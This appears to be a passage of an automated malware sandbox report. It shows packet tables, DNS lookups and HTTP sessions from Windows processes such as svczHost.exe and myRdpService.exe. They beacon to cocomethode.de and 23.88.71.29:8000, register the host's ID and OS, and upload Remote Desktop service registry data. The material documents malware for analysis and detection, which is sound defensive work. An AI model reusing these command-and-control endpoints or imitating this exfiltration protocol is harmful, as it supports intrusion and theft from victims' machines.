Dec 11, 2024 12:31:09.071989059 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.299263954 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.299489021 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.299494028 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.299535990 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.299700975 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.300067902 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.300337076 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.300918102 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.300997972 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.301130056 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.301162004 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.301182985 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.301693916 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.301911116 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.301944017 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.302136898 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.302462101 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.302674055 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.302680016 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.302714109 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.302889109 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.302993059 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.303543091 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.303706884 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.304045916 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.304263115 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.304296970 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.304486990 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.531650066 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.531858921 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.531909943 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.532054901 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.532105923 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.532423973 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.532592058 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.533400059 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.533528090 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.533541918 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.533641100 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.533682108 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.533688068 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.533787966 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.534106016 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.534230947 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.534243107 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.534384012 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.534884930 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.535036087 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.535048008 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.535178900 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.535185099 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.535299063 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.535805941 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.535945892 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.536585093 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.536684990 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.536725044 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.536735058 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.536945105 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.536946058 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.762984991 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.764158964 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.764885902 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.764892101 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.765108109 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.766062021 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.766062021 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.766077042 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.766623020 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.766834974 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.767021894 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.767034054 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.767627954 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.767627954 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.767765999 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.769016027 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.769037962 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.769839048 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.770054102 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.770054102 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.770066977 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.770983934 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.770983934 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.995297909 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.995302916 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.995465994 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.995477915 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.995511055 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.995515108 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.995644093 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.995709896 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.997514009 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.997529030 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.997677088 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.997677088 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.997769117 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.997773886 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.997817993 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.997984886 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.999877930 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.999890089 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.000076056 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.000076056 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.000076056 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.000086069 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.000181913 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.000866890 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.001601934 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.001616955 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.001739979 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.001790047 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.001790047 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.001796007 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.001840115 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.001885891 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.001935005 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.002360106 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.002495050 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.002566099 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.002612114 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.002616882 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.002763033 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.226865053 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.226871967 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.226967096 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.227914095 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.227914095 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.227935076 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.227946043 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.228763103 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.229352951 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.229377985 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.229584932 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.229598045 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.229938984 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.231076002 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.231098890 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.231314898 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.231369972 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.231380939 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.231519938 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.233597040 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.233616114 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.233830929 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.233830929 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.233844995 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.234006882 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.235512972 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.235532999 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.235722065 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.235722065 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.235738039 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.235748053 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.235913038 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.236134052 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.236378908 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.459676981 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.459683895 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.459856987 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.459875107 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.459875107 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.459897995 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.459918976 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.459929943 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.460057974 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.460057974 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.461782932 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.461805105 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.461981058 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.461981058 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.462002993 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.462013006 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.462102890 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.462268114 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.464382887 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.464406013 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.464603901 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.464603901 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.464603901 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.464627028 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.464639902 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.464852095 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.466074944 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.466098070 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.466322899 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.466322899 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.466342926 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.466531992 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.468533039 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.468554974 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.468725920 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.468725920 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.468749046 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.468759060 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.468832016 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.468940020 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.470427036 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.470449924 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.470621109 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.470621109 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.470643997 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.470643997 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.470654964 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.470798016 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.470869064 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.471950054 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.472146988 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.472146988 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.472177029 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:10.472188950 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:10.514580011 CET	49766	443	192.168.11.20	104.21.1.51

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 12:28:57.708769083 CET	59986	53	192.168.11.20	1.1.1.1
Dec 11, 2024 12:28:57.843254089 CET	53	59986	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 12:28:57.708769083 CET	192.168.11.20	1.1.1.1	0xe561	Standard query (0)	cocomethode.de	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 12:28:57.843254089 CET	1.1.1.1	192.168.11.20	0xe561	No error (0)	cocomethode.de		104.21.1.51	A (IP address)	IN (0x0001)	false
Dec 11, 2024 12:28:57.843254089 CET	1.1.1.1	192.168.11.20	0xe561	No error (0)	cocomethode.de		172.67.128.139	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cocomethode.de

23.88.71.29:8000

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49760	104.21.1.51	80	6444	C:\Windows\Temp\svczHost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:29:41.487816095 CET	73	OUT	GET /api/check HTTP/1.1 Host: cocomethode.de Connection: Keep-Alive
Dec 11, 2024 12:29:41.920037985 CET	1289	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdeBGAWHpprOElh6%2Ba0HSHL2t%2BnD1i9sXV4PLQlbMBIURN9nyZhjEKkNML82G5qSfQK4vFbLQsEgGdHmRPsp7posZ8ovatI5bdULCbszmB69z%2F61fS2XJ0R1t%2BZxCuqtDpDQNwrPqzeD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11914&min_rtt=1526&rtt_var=18624&sent=20&recv=31&lost=0&retrans=0&sent_bytes=3371&recv_bytes=22803&delivery_rate=1803582&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05236aa872dd20-ATL server-timing: cfL4;desc="?proto=TCP&rtt=40&min_rtt=40&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=298&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=114017&min_rtt=114017&rtt_var=57008&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=73&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 36 33 0d 0a 31 37 33 33 39 31 36 35 38 31 7c 42 4e 6b 7a Data Ascii: 1631733916581\|BNkz
Dec 11, 2024 12:29:41.920061111 CET	342	IN	Data Raw: 69 68 2b 71 2f 77 37 78 54 48 68 6c 61 62 36 56 57 30 49 57 4e 72 2b 5a 78 57 4a 72 76 52 73 6b 56 67 32 67 79 67 57 56 33 78 78 4f 53 79 47 75 73 68 68 5a 57 34 47 44 71 71 6f 4c 4e 72 74 36 56 72 4f 78 42 37 78 63 6a 62 33 31 59 4e 2f 65 33 78 Data Ascii: ih+q/w7xTHhlab6VW0IWNr+ZxWJrvRskVg2gygWV3xxOSyGushhZW4GDqqoLNrt6VrOxB7xcjb31YN/e3xM/nM7FT3RZRJ8Rc0vC1rSiBL2IGDCQ0nO90xnCV3qEJ9pCPwsORgyT/K+yrj0wrlZIb7WmKO73CXezyzfKmUajlcFQ4HXtAKKk/zF8abNLOQ/5b4p6bPO7ROhKYZp6MzThTOUM/JZ+WwG2cvEzJhZMCQHC3710Cog
Dec 11, 2024 12:29:41.920075893 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49763	23.88.71.29	8000	2236	C:\Windows\Temp\myRdpService.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:30:26.014689922 CET	164	OUT	GET /client/ws HTTP/1.1 Host: 23.88.71.29:8000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Key: O2K7+xXYk0GzErsWSELewg== Sec-WebSocket-Version: 13
Dec 11, 2024 12:30:26.767307997 CET	840	IN	HTTP/1.1 101 Switching Protocols Upgrade: Websocket Server: Microsoft-IIS/8.5 Sec-Websocket-Accept: 812EeFhcFBU6CwM7RkPlbhIWq08= CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x4YUE4wemxAuxt93EoaGZ%2FGziFJkD%2BfpNVDZSYSv4zFzsNuSkKocmeoZLIW6DhiNDc84iORcARpVqE7fIj8Ac2Iq5CYwOaz2hjQXs1knFfM23YrcAa%2FWuDNhB0pZag1Nj6%2FzZ0XAha5%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f0524815d3565ae-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5326&min_rtt=5326&rtt_var=2663&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=307&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Connection: Upgrade Date: Wed, 11 Dec 2024 11:30:25 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49764	23.88.71.29	8000	2236	C:\Windows\Temp\myRdpService.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:30:30.239000082 CET	234	OUT	POST /api/registry HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: application/json Content-Length: 102 Data Raw: 22 36 33 30 31 33 33 37 32 46 36 35 37 35 41 39 44 34 45 41 32 39 43 42 36 30 38 37 39 38 45 44 39 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "63013372F6575A9D4EA29CB608798ED9\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Dec 11, 2024 12:30:31.009083986 CET	803	IN	HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8OQq7xAcTi0FZbJIsLMScYbupClIH9LxOukzg8esiJp1Vxi0tCZXCV5By3Ku9vUVMCHpF%2FN2253%2BTjULBx5SVKPYdA0y%2FOwjw83STO3lhjzDFsXTvZx7c07mEJcWL2HuPnFwc7Pd6pU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f05249bbaa239d9-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5405&min_rtt=5405&rtt_var=2702&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=380&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Wed, 11 Dec 2024 11:30:30 GMT Content-Length: 32 Data Raw: 32 39 62 37 61 38 66 38 64 39 39 36 37 63 61 34 63 33 31 36 36 32 36 39 61 61 34 64 65 37 35 37 Data Ascii: 29b7a8f8d9967ca4c3166269aa4de757

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49765	23.88.71.29	8000	2236	C:\Windows\Temp\myRdpService.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:30:31.225790977 CET	1289	OUT	POST /api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757 HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---------------------8dd19ad4ec7f3d5 Content-Length: 5689 Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 61 64 34 65 63 37 66 33 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 [TRUNCATED] Data Ascii: -----------------------8dd19ad4ec7f3d5Content-Disposition: form-data; name="file"; filename="regBackup.reg"Content-Type: application/octet-streamWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00"Description"="@%SystemRoot%\\System32\\termsrv.dll,-267""DisplayName"="@%SystemRoot%\\System32\\termsrv.dll,-268""ErrorControl"=dword:00000001"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea, [TRUNCATED]
